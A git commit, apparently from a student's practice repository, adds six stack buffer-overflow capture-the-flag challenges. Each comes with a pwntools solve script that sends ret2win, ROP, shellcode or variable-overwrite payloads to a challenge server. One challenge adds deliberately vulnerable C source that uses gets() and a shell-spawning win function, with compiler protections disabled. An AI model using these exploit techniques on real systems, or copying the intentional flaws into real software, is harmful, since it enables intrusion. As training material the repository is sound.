commit 563524658109056bb3737486c1544fdfceca3c5f Author: emln Date: Sat May 9 20:58:42 2026 +0200 First CTFs diff --git a/BOF/.gdb_history b/BOF/.gdb_history new file mode 100644 index 0000000..58afc78 --- /dev/null +++ b/BOF/.gdb_history @@ -0,0 +1,2 @@ +run +quit diff --git a/BOF/01_guestbook/.gdb_history b/BOF/01_guestbook/.gdb_history new file mode 100644 index 0000000..ff60466 --- /dev/null +++ b/BOF/01_guestbook/.gdb_history @@ -0,0 +1 @@ +quit diff --git a/BOF/01_guestbook/guestbook b/BOF/01_guestbook/guestbook new file mode 100755 index 0000000..1b70362 Binary files /dev/null and b/BOF/01_guestbook/guestbook differ diff --git a/BOF/01_guestbook/solve.py b/BOF/01_guestbook/solve.py new file mode 100644 index 0000000..de70724 --- /dev/null +++ b/BOF/01_guestbook/solve.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python3 +from pwn import * + +# context.binary = elf = ELF('guestbook',checksec=False) +OFFSET_TO_RIP = 72 +ret = 0x40101A # ROPGadget ret +win = 0x40121B # win address (nm) +# p = process(elf.path) +p = remote("offsec.m0lecon.it", 13599) +p.recvuntil(b"name?\n") + +payload = flat( + b"A" * OFFSET_TO_RIP, + p64(ret), + p64(win), +) +p.send(payload) +p.interactive() diff --git a/BOF/02_whispered_secrets/.gdb_history b/BOF/02_whispered_secrets/.gdb_history new file mode 100644 index 0000000..a3e9e92 --- /dev/null +++ b/BOF/02_whispered_secrets/.gdb_history @@ -0,0 +1,2 @@ +r +quit diff --git a/BOF/02_whispered_secrets/solve.py b/BOF/02_whispered_secrets/solve.py new file mode 100644 index 0000000..b404324 --- /dev/null +++ b/BOF/02_whispered_secrets/solve.py @@ -0,0 +1,20 @@ +#!/usr/bin/env python3 +from pwn import * + +context.binary = elf = ELF("whispered_secrets", checksec=False) +context.arch = "amd64" +context.os = "linux" + +OFFSET_TO_RIP = 136 + +p = remote("offsec.m0lecon.it", 13528) + +leak_line = p.recvline_contains(b"secret:") +buf_addr = int(leak_line.split(b"secret: ")[1].strip(), 16) +log.info(f"buf = {buf_addr:#x}") +# NX disabled +shellcode = asm(shellcraft.sh()) + +payload = flat(shellcode, b"A" * (OFFSET_TO_RIP - len(shellcode)), p64(buf_addr)) +p.sendafter(b"secret:\n", payload) +p.interactive() diff --git a/BOF/02_whispered_secrets/whispered_secrets b/BOF/02_whispered_secrets/whispered_secrets new file mode 100755 index 0000000..c41a3e6 Binary files /dev/null and b/BOF/02_whispered_secrets/whispered_secrets differ diff --git a/BOF/03_tiny_escape_room/.gdb_history b/BOF/03_tiny_escape_room/.gdb_history new file mode 100644 index 0000000..4add7a7 --- /dev/null +++ b/BOF/03_tiny_escape_room/.gdb_history @@ -0,0 +1,4 @@ +disass vuln +run +run +quit diff --git a/BOF/03_tiny_escape_room/Makefile b/BOF/03_tiny_escape_room/Makefile new file mode 100644 index 0000000..0b65e39 --- /dev/null +++ b/BOF/03_tiny_escape_room/Makefile @@ -0,0 +1,10 @@ +CC = gcc +CFLAGS = -fno-stack-protector -no-pie -O0 -g + +all: escape_room + +escape_room: main.c + $(CC) $(CFLAGS) -o $@ $< + +clean: + rm -f escape_room diff --git a/BOF/03_tiny_escape_room/escape_room b/BOF/03_tiny_escape_room/escape_room new file mode 100755 index 0000000..91d3adc Binary files /dev/null and b/BOF/03_tiny_escape_room/escape_room differ diff --git a/BOF/03_tiny_escape_room/main.c b/BOF/03_tiny_escape_room/main.c new file mode 100644 index 0000000..fcf3c26 --- /dev/null +++ b/BOF/03_tiny_escape_room/main.c @@ -0,0 +1,37 @@ +#include +#include +#include + +void setup() { + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); +} + +void win(int arg1, int arg2) { + if (arg1 == 0xdeadbeef && arg2 == 0xcafebabe) { + puts("Door unlocked!"); + system("/bin/sh"); + } else { + printf("Wrong keys: 0x%x, 0x%x\n", arg1, arg2); + } +} + +void gadgets() { + __asm__("pop %rdi; ret"); + __asm__("pop %rsi; ret"); +} + +void vuln() { + char buffer[64]; + puts("Welcome to the tiny escape room!"); + puts("Two magic keys open the door."); + puts("keys?"); + gets(buffer); +} + +int main() { + setup(); + vuln(); + return 0; +} diff --git a/BOF/03_tiny_escape_room/solve.py b/BOF/03_tiny_escape_room/solve.py new file mode 100644 index 0000000..4e7f5bf --- /dev/null +++ b/BOF/03_tiny_escape_room/solve.py @@ -0,0 +1,33 @@ +#!/usr/bin/env python3 +from pwn import * + +context.binary = elf = ELF("./escape_room", checksec=False) + +# p = process(elf.path) +p = remote("offsec.m0lecon.it", 13566) +# p.recvuntil(b"keys?\n") +# Your exploit here + +var1 = 0xDEADBEEF +var2 = 0xCAFEBABE +OFFSET = 72 +# Gadget to overwrite rdi e rsi (pop) +# (Creati in main.c) +rdi = 0x401287 +rsi = 0x401289 +ret = 0x40101A +# win addr +win = 0x40121B +payload = flat( + b"A" * OFFSET, + p64(rsi), + p64(var2), + p64(rdi), + p64(var1), + p64(ret), + p64(win), +) +p.send(payload) +# p.send(b'cat flag\n') +# p.recv() +p.interactive() diff --git a/BOF/04_lemonade_stand/.gdb_history b/BOF/04_lemonade_stand/.gdb_history new file mode 100644 index 0000000..832b898 --- /dev/null +++ b/BOF/04_lemonade_stand/.gdb_history @@ -0,0 +1,53 @@ +disass vuln +b *0x00000000000012a7 +run +n +n +n +n +n +n +c +v +c +quit +run +disass main +b *+23 +disass main +breaj +23 +break +23 +info breakpoint +info breakpoints +clear breakpoints +layout asm +b +b main +c +r +b +23 +b main+23 +b *(main+23) +c +ni +ni +c +quit +disass main +quit +disass main +disass vuln +b *0x00000000000012a2 +r +b +5 +quit +disass vuln +b *0x00000000000012a2 +r +quit +quit +run +quit +r +disass vuln +quit diff --git a/BOF/04_lemonade_stand/lemonade_stand b/BOF/04_lemonade_stand/lemonade_stand new file mode 100755 index 0000000..6d06f47 Binary files /dev/null and b/BOF/04_lemonade_stand/lemonade_stand differ diff --git a/BOF/04_lemonade_stand/solve.py b/BOF/04_lemonade_stand/solve.py new file mode 100644 index 0000000..d7cd67e --- /dev/null +++ b/BOF/04_lemonade_stand/solve.py @@ -0,0 +1,16 @@ +#!/usr/bin/env python3 +from pwn import * + +context.binary = elf = ELF("./lemonade_stand", checksec=False) + +# p = process(elf.path) +p = remote("offsec.m0lecon.it", 13562) +# Your exploit here +# mov eax, DWORD_PTR[rbp-0x4] overwrite eax value +OFFSET = 76 +leet = 0x1337 +payload = flat(b"A" * OFFSET, p64(leet)) +p.send(payload) +# p.send(b'cat flag\n') +# p.recv() +p.interactive() diff --git a/BOF/05_mini_game_arena/.gdb_history b/BOF/05_mini_game_arena/.gdb_history new file mode 100644 index 0000000..a9cdbf3 --- /dev/null +++ b/BOF/05_mini_game_arena/.gdb_history @@ -0,0 +1,3 @@ +r +:q +quit diff --git a/BOF/05_mini_game_arena/mini_game b/BOF/05_mini_game_arena/mini_game new file mode 100755 index 0000000..2f051d3 Binary files /dev/null and b/BOF/05_mini_game_arena/mini_game differ diff --git a/BOF/05_mini_game_arena/solve.py b/BOF/05_mini_game_arena/solve.py new file mode 100644 index 0000000..e4ba05e --- /dev/null +++ b/BOF/05_mini_game_arena/solve.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python3 +from pwn import * + +context.binary = elf = ELF('./mini_game', checksec=False) + +#p = process(elf.path) +p = remote('offsec.m0lecon.it', 13509) +# Your exploit here +OFFSET = 72 +win = 0x4011fb +payload = flat( + b'A'*OFFSET, + win, +) +p.send(payload) +#p.send(b'cat flag\n') +#p.recv() +p.interactive() diff --git a/BOF/06_cosmic_burger_joint/.gdb_history b/BOF/06_cosmic_burger_joint/.gdb_history new file mode 100644 index 0000000..2451afd --- /dev/null +++ b/BOF/06_cosmic_burger_joint/.gdb_history @@ -0,0 +1,4 @@ +run +quit +disass vuln +quit diff --git a/BOF/06_cosmic_burger_joint/cosmic_burger b/BOF/06_cosmic_burger_joint/cosmic_burger new file mode 100755 index 0000000..70a5e81 Binary files /dev/null and b/BOF/06_cosmic_burger_joint/cosmic_burger differ diff --git a/BOF/06_cosmic_burger_joint/solve.py b/BOF/06_cosmic_burger_joint/solve.py new file mode 100644 index 0000000..47a938b --- /dev/null +++ b/BOF/06_cosmic_burger_joint/solve.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python3 +from pwn import * + +context.binary = elf = ELF("./cosmic_burger", checksec=False) + +p = process(elf.path) +p = remote("offsec.m0lecon.it", 13529) +# Your exploit here +OFFSET = 40 +# mov eax,DWORD PTR [rbp-0x4] +# cmp eax,0xbeef +# jne 0x12f2 +# mov eax,DWORD PTR [rbp-0x8] +# cmp eax,0xf00d +first = 0xBEEF +second = 0xF00D +payload = flat( + b"A" * OFFSET, + p32(second), + p32(first), +) +p.send(payload) +p.interactive()